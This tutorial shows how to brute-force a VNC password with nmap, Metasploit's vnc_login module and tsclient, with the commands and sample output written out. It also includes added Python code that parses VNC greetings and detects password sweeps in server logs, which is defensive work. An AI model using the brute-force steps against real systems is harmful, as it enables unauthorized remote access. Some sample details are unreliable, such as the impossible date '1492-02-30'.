control – metasploit vnc scanner

Backtrack 5R1

1. Scan for open vnc service using nmap

root@bt:~# nmap -sS -sC -p 5900 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 14:25 BST
Nmap scan report for IP-Address
Host is up (0.00054s latency).
PORT STATE SERVICE
5900/tcp open vnc
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
MAC Address: 08:00:27:EB:18:CC (Micky Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
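The `vnc-info` lines above come from the first bytes a VNC server sends: a 12-byte `RFB xxx.yyy` version string, then the security type(s) it offers. The parser below is an added example (not code from this post, from nmap, or from Metasploit) that decodes that greeting offline from constructed byte strings and reports what someone auditing their own VNC exposure wants to know: whether `None` (no authentication) is offered, whether the server is stuck on legacy RFB 3.3, and whether plain VNC Authentication (the password challenge/response the next step guesses) is available. The first sample mirrors the scan above: 33554432 is 0x02000000, which is the bytes of security type 2 (VNC Authentication) read in the opposite byte order, consistent with nmap printing it as an unknown type.

```python
"""Decode a VNC (RFB) server greeting and flag weak authentication settings.

Added example: not code from the original post, nmap or Metasploit.
It parses the bytes a VNC server sends first (what nmap's vnc-info script
summarises as "Protocol version" and "Security types"); the sample greetings
at the bottom are constructed for this example.
"""
import re
import struct

# Security type numbers as assigned in the RFB specification (RFC 6143 and
# the IANA RFB registry); anything else is reported as unknown(<n>).
SECURITY_TYPES = {
    0: "Invalid",
    1: "None",                # no authentication at all
    2: "VNC Authentication",  # DES challenge/response on the password
    16: "Tight",
    18: "TLS",
    19: "VeNCrypt",
}

GREETING_RE = re.compile(rb"RFB (\d{3})\.(\d{3})\n")


def _reason(buf: bytes):
    """Failure reason string: U32 big-endian length followed by text."""
    if len(buf) < 4:
        return None
    (n,) = struct.unpack(">I", buf[:4])
    return buf[4:4 + n].decode("latin-1", "replace")


def parse_greeting(data: bytes) -> dict:
    """Parse the version string plus the security-type announcement.

    RFB 3.3: the server picks one type and sends it as a big-endian U32.
    RFB 3.7/3.8: the server sends a count byte, then one byte per offered type.
    """
    m = GREETING_RE.match(data[:12])
    if not m:
        raise ValueError("not an RFB greeting")
    version = (int(m.group(1)), int(m.group(2)))
    body = data[12:]
    result = {"version": version, "security_types": [], "byte_order_suspect": False, "reason": None}

    if version <= (3, 3):
        if len(body) < 4:
            raise ValueError("truncated RFB 3.3 security-type field")
        (stype,) = struct.unpack(">I", body[:4])
        if stype not in SECURITY_TYPES:
            # A huge value such as 33554432 (0x02000000) is type 2 with the
            # bytes reversed; accept it but record that something is off.
            (flipped,) = struct.unpack("<I", body[:4])
            if flipped in SECURITY_TYPES:
                result["byte_order_suspect"] = True
                stype = flipped
        if stype == 0:
            result["reason"] = _reason(body[4:])
        else:
            result["security_types"] = [stype]
    else:
        if not body:
            raise ValueError("truncated security-type list")
        count = body[0]
        if count == 0:
            result["reason"] = _reason(body[1:])
        else:
            result["security_types"] = list(body[1:1 + count])
    return result


def assess(parsed: dict) -> list:
    """Defender-side findings for one parsed greeting (empty list = nothing to flag)."""
    types = parsed["security_types"]
    findings = []
    if parsed["version"] <= (3, 3):
        findings.append("legacy RFB 3.3: single server-chosen security type, no TLS/VeNCrypt possible")
    if 1 in types:
        findings.append("security type None offered: unauthenticated access")
    if 2 in types:
        findings.append("VNC Authentication offered: password limited to 8 significant characters, "
                        "guessable online and challenge/response visible on the wire")
    if parsed["byte_order_suspect"]:
        findings.append("security-type field only decodes after a byte swap: non-conforming server or decoder")
    return findings


def describe(parsed: dict) -> str:
    names = [SECURITY_TYPES.get(t, f"unknown({t})") for t in parsed["security_types"]]
    return "RFB %d.%d, security types: %s" % (*parsed["version"], ", ".join(names) or "none (failed)")


# Constructed samples. The first mirrors the post's scan: version 3.3 and a
# security-type field that nmap reported as the unknown value 33554432.
SAMPLE_33_SWAPPED = b"RFB 003.003\n" + b"\x02\x00\x00\x00"
SAMPLE_38_NONE_OFFERED = b"RFB 003.008\n" + b"\x02\x01\x02"   # offers None and VNC Auth
SAMPLE_38_VENCRYPT = b"RFB 003.008\n" + b"\x01\x13"            # offers VeNCrypt only

if __name__ == "__main__":
    for sample in (SAMPLE_33_SWAPPED, SAMPLE_38_NONE_OFFERED, SAMPLE_38_VENCRYPT):
        p = parse_greeting(sample)
        print(describe(p))
        for f in assess(p):
            print("  !", f)
```

Run it on bytes captured from your own servers (nmap's output is a summary of exactly these bytes) to inventory which hosts still answer with RFB 3.3 or offer `None`; those are the ones where the password sweep in the next step succeeds.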

2. Use Metasploit to brute-force the password, leaving the username at its default (blank)

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set PASS_FILE /opt/metasploit-4.1.4/msf3/data/wordlists/vnc_passwords.txt

(Optionally, supply a combined username/password list instead: msf auxiliary(vnc_login) > set USERPASS_FILE /opt/metasploit-4.1.4/msf3/data/wordlists/VNC_default_user.txt)
msf auxiliary(vnc_login) > set rhosts IP-Address
msf auxiliary(vnc_login) > set BRUTEFORCE_SPEED 3
msf auxiliary(vnc_login) > run

[*] IP-Address:5900 - Starting VNC login sweep
[*] IP-Address:5900 VNC - [01/18] - Attempting VNC login with password ''
[*] IP-Address:5900 VNC - [01/18] - , VNC server protocol version : 3.3
[-] IP-Address:5900 VNC - [01/18] - , Authentication failed
[*] IP-Address:5900 VNC - [02/18] - Attempting VNC login with password 'password'
[*] IP-Address:5900 VNC - [02/18] - , VNC server protocol version : 3.3

[+] IP-Address:5900, VNC server password : "password"

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
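The sweep output above is what the server side sees too: a burst of failed authentications from one address, then a success. The detector below is an added example, not code from this post or from Metasploit. It works over a constructed, illustrative log format (real VNC servers such as TigerVNC, RealVNC or x11vnc each log in their own format, so `LINE_RE` is the part to adapt), alerts when one source accumulates a threshold of failures inside a time window, and raises a higher-priority alert when a success follows such a burst.

```python
"""Spot VNC password sweeps in server-side authentication logs.

Added example: not code from the original post or from Metasploit. The log
format below is constructed for the example; real VNC servers each log
differently, so LINE_RE is the part to adapt.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed format:
#   <ISO timestamp> vncserver[<pid>]: <client ip>: authentication failed|succeeded
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) vncserver\[\d+\]: "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}): authentication (?P<result>failed|succeeded)$"
)


def parse_line(line: str):
    """Return {"ts", "src", "result"} for an auth line, None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"], "result": m["result"]}


def detect(lines, threshold=5, window=timedelta(seconds=60), success_after=3):
    """Sliding-window detector over parsed auth events.

    vnc_bruteforce:             `threshold` failures from one source inside `window`
    vnc_success_after_failures: a success preceded by >= `success_after` failures
                                in `window` (the [+] line above, seen from the server)
    """
    recent = defaultdict(deque)   # src -> timestamps of failures still inside the window
    flagged = set()               # sources already reported as brute-forcing
    alerts = []
    for ev in filter(None, map(parse_line, lines)):
        q = recent[ev["src"]]
        while q and ev["ts"] - q[0] > window:   # expire old failures
            q.popleft()
        if ev["result"] == "failed":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["src"] not in flagged:
                flagged.add(ev["src"])
                alerts.append({"kind": "vnc_bruteforce", "src": ev["src"],
                               "failures": len(q), "at": ev["ts"]})
        else:
            if len(q) >= success_after:
                alerts.append({"kind": "vnc_success_after_failures", "src": ev["src"],
                               "failures": len(q), "at": ev["ts"]})
            q.clear()
            flagged.discard(ev["src"])
    return alerts


# Constructed sample: one user mistyping once, then a sweep from another address
# that succeeds on the seventh try (addresses from the RFC 5737 documentation ranges).
SAMPLE_LOG = """\
2013-02-20T14:25:00 vncserver[2210]: 198.51.100.7: authentication failed
2013-02-20T14:25:04 vncserver[2210]: 198.51.100.7: authentication succeeded
2013-02-20T14:25:10 vncserver[2210]: 192.0.2.10: authentication failed
2013-02-20T14:25:11 vncserver[2210]: 192.0.2.10: authentication failed
2013-02-20T14:25:12 vncserver[2210]: 192.0.2.10: authentication failed
2013-02-20T14:25:13 vncserver[2210]: 192.0.2.10: authentication failed
2013-02-20T14:25:14 vncserver[2210]: 192.0.2.10: authentication failed
2013-02-20T14:25:15 vncserver[2210]: 192.0.2.10: authentication failed
2013-02-20T14:25:16 vncserver[2210]: 192.0.2.10: authentication succeeded
2013-02-20T14:25:20 vncserver[2210]: listening on port 5900
"""


def sample_alerts():
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for a in sample_alerts():
        print(a["at"].isoformat(), a["src"], a["kind"], "failures=%d" % a["failures"])
```

The sweep in the post makes 18 guesses at `BRUTEFORCE_SPEED 3`, so a threshold of five failures in a minute catches it well before the list is exhausted. Detection only buys time, though: the RFB protocol itself imposes no limit on guesses, so the fix is a lockout or rate limit on the server and not exposing port 5900 directly (SSH or VPN in front of it).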

3. Open Terminal Server Client

root@bt:~# tsclient

Computer = IP-Address
Protocol = VNC
Username = leave blank
Press Connect

4. A password box will open; type in the password and press Enter.
